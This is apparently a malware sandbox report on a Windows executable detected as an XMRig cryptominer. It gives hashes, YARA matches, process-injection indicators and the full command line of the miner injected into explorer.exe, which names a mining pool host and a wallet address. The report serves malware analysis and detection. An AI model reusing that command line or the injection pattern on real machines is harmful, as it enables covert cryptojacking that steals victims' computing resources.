xmrig | c8b2a95772513443b8190da58118e3fbfa5bb1de6fb61bfc9591e6ed005c72b6

Analysis

max time kernel
134s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
22-12-2023 13:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a04e6163df65a8e04e2b475d0cf15755.exe
Size

21.7MB
MD5

a04e6163df65a8e04e2b475d0cf15755
SHA1

3addae560d8d0d6c3f90231aeb5bba31f32f3ede
SHA256

c8b2a95772513443b8190da58118e3fbfa5bb1de6fb61bfc9591e6ed005c72b6
SHA512

0c63422273d46e6b4e255fcfd78362665b90e1bfa2d2a8b733f7c7c83f2a8050b6955b893522ecd2ee59e1f84b0a4546c05f5ca7bc333fd26d5e257cd7f48ce9
SSDEEP

393216:fgLhy8yLsNyFQJ+Fx8VWUt6XM9g0rTwygZHz1aMbeLn0/JJzyGsnbhsRfg:I1JCswFQJ+FGr6XM9g0g5z1aMaD0xJH2

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 5 IoCs

miner

resource	yara_rule
behavioral2/memory/1664-7-0x0000000140000000-0x0000000140705000-memory.dmp	xmrig
behavioral2/memory/1664-10-0x0000000140000000-0x0000000140705000-memory.dmp	xmrig
behavioral2/memory/1664-11-0x0000000140000000-0x0000000140705000-memory.dmp	xmrig
behavioral2/memory/1664-13-0x0000000140000000-0x0000000140705000-memory.dmp	xmrig
behavioral2/memory/1664-17-0x0000000140000000-0x0000000140705000-memory.dmp	xmrig

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1504 set thread context of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1504	a04e6163df65a8e04e2b475d0cf15755.exe
Token: SeLockMemoryPrivilege	1664	explorer.exe
Token: SeLockMemoryPrivilege	1664	explorer.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94
PID 1504 wrote to memory of 1664	1504	a04e6163df65a8e04e2b475d0cf15755.exe	94

C:\Users\Admin\AppData\Local\Temp\a04e6163df65a8e04e2b475d0cf15755.exe
"C:\Users\Admin\AppData\Local\Temp\a04e6163df65a8e04e2b475d0cf15755.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe --cinit-find-x -B -a rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 -u 44XUb34A5rdHk1oZSPfxneTeZWGasDV1aJKR1decyXbm1RLsM4Ti5URUVv2JaH7VXQTbWZFvsEDsaWRpFfxFXAYdPqGHrYZ -p --cpu-max-threads-hint=70
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1664

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1504-9-0x00007FFEA6AE0000-0x00007FFEA75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1504-1-0x0000000000810000-0x0000000001DC2000-memory.dmp

Filesize
21.7MB

Download
memory/1504-2-0x000000001D940000-0x000000001D950000-memory.dmp

Filesize
64KB

Download
memory/1504-3-0x000000001DD50000-0x000000001F300000-memory.dmp

Filesize
21.7MB

Download
memory/1504-5-0x00000000047F0000-0x00000000047FA000-memory.dmp

Filesize
40KB

Download
memory/1504-4-0x00000000047C0000-0x00000000047D2000-memory.dmp

Filesize
72KB

Download
memory/1504-0-0x00007FFEA6AE0000-0x00007FFEA75A1000-memory.dmp

Filesize
10.8MB

Download
memory/1664-10-0x0000000140000000-0x0000000140705000-memory.dmp

Filesize
7.0MB

Download
memory/1664-7-0x0000000140000000-0x0000000140705000-memory.dmp

Filesize
7.0MB

Download
memory/1664-11-0x0000000140000000-0x0000000140705000-memory.dmp

Filesize
7.0MB

Download
memory/1664-12-0x0000000002340000-0x0000000002360000-memory.dmp

Filesize
128KB

Download
memory/1664-13-0x0000000140000000-0x0000000140705000-memory.dmp

Filesize
7.0MB

Download
memory/1664-14-0x0000000002370000-0x0000000002390000-memory.dmp

Filesize
128KB

Download
memory/1664-15-0x0000000002390000-0x00000000023B0000-memory.dmp

Filesize
128KB

Download
memory/1664-16-0x0000000013F90000-0x0000000013FB0000-memory.dmp

Filesize
128KB

Download
memory/1664-17-0x0000000140000000-0x0000000140705000-memory.dmp

Filesize
7.0MB

Download
memory/1664-18-0x0000000002390000-0x00000000023B0000-memory.dmp

Filesize
128KB

Download
memory/1664-19-0x0000000013F90000-0x0000000013FB0000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads